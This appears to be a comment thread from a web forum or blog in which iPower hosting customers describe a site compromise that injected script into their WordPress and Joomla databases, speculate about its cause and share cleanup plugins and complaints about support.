SWITCH OVER FAST! ipower support is clueless, i had to repeat and rephrase an htaccess issue i had several times until someone understood it. another issue was with shopsite, they are using an ancient version that even has a 2008 copyright at the bottom! they also complain about excessive mysql usage.
be aware that ipower is owned by endurance group international. they own tens of “hosting companies” but it’s all the same under different brands.
try your luck finding reviews at webhostingtalk.com, a lot of it is BS. as for my own experience, there i found wiredtree.com and databasebydesignllc.com for vps and dedicated servers, and i absolutely love them.
i’m only struggling with ipower shared hosting because of a few stubborn clients. but this finally convinced them to get small server 😉
Hmmm…just had the same issue with my ipower site. they have sent it to a “higher” level. I got the infoitpoweringgathering.com and my photos were slow to load. I’ve been with ipower for years. i end up resolving most of my issues. very frustrating…
Same problem here on all of my websites on ipower. (both wordpress and joomla) cleaned up the databases and still waiting to hear from them…. Please log the issue with support. (if we are many they might listen to us)
I’ve been on the phone with IPOWER support for an hour trying to explain this to them. It’s not just WP sites, I’m seeing it on my Joomla! sites as well. Therefor, it is most likely something to do with their MySQL servers. What I do know is that you can google the domain name infoitpoweringgathering.com and if you do a whois on any of the sites where the script is showing as indexed you will find the following:
Name Server: NS1.IPOWER.COM
Name Server: NS2.IPOWER.COM
or
Name Server: NS1.IPOWERDNS.COM
Name Server: NS1.IPOWERWEB.NET
8 out of 8 that I did a whois on came back with one of the above.
Some of you may recall that something similar happen with MediaTemple back in December of 2009 – where one of their Gridservers was compromised. It took them months to clean it up!

I just had the same problem on three of my five Ipower WordPress blogs. So yes, I am sure Ipower got hacked. I know the Ipower support is weak so I looked on here first. I used the search and replace plugin referred to in previous posts and it worked on all three blogs. Thanks you SO MUCH for that tip and for this forum!!!
Anyone else with this problem I suggest trying the plugin.
Thank you SO MUCH to mlazopoulou who I know through twitter for telling me about this! I’ve been out last 2 days, and I don’t often visit my own blogs, so didn’t know. What an f-ing mess. Infected all 4 blogs.
I used the Search & Replace plugin, after deleting Super Cache cache. (which aren’t marked as deleted in the plugin, but look deleted in my file manager in Ipower.)
Is it better somehow to do the extremely complicated instructions above about entering mysql, etc? The plugin is very clear that it is ACTUALLY CHANGING YOUR SQL, so I think it’s the same thing, but please tell me if I’m wrong.
This was absolutely terrifying – I was scared ipower would interrupt in the middle and remove everything (yes, I have backups, but I’m a cartoonist w/images) in their clumsy way. It infuriates me that they have always referred to WordPress as a dirty stepchild, and they take NO RESPONSIBILITY for databases, mysql, etc, always blaming it on WP.
What to do? Obviously, it could all happen again in an hour. I will write about this and promote on twitter and facebook. Outrageous that they are pretending it’s not their fault.
ok so I ran the plug in and that seems to have removed the code. The next question. Is anyone else having trouble uploading pictures to their post. I browse and upload the pic. Add the tex, description and text but when I click insert into post it takes me to a blank screen…… suggestions?
I have IPOWER as well and am experiencing the same problem. All my sites have pages missing or deleted. aaack. I’m gonna try downloading this search and replace plugin and let you all know. I will try inserting pics in a post and let you know jasonc2.

I’m having the exact same problem on my iPower-hosted WP site.
In iPower’s Facebook page comment on the issue they recommended a WordPress “Firewall 2” plug-in:

The firewall plug-in recommended seems to have solved the problem (previously the site loaded incredibly slowly since the compromise 2 days ago, and it’s back to very quick loads immediately after installing the firewall).
Hope that helps. If anyone knows of any potential problems or side-effects of WP firewall software let me know.

Ipower is doing a lovely little tapdance over at the Facebook page. THEY were hacked, but it’s our responsibility to clean up the mess, and they don’t know if we’ll recover all our data. WORST. HOSTING. EVER.
I would like to hear if any WP people on Ipower were NOT hacked. I had just changed every single password to like 15 random figures, myself, 2 weeks ago. I suspect every single blog has been infected, but don’t want to assume until we hear from more users.
Well, I have clients with their own accounts on Ipower and my client at http://www.taliamedance.com was not affected from what I can tell. but pages were deleted out of 3 of my other sites that are on one acount:

Ravenousravendsign, that does suck. I don’t know how I could even find which pages of mine might have been deleted, on 4 blogs. They’re not numbered. It would take a while to remember each one…
I’m also surprised the malware had that power. Are you sure Ipower didn’t do it, while trying to “fix” the problem?
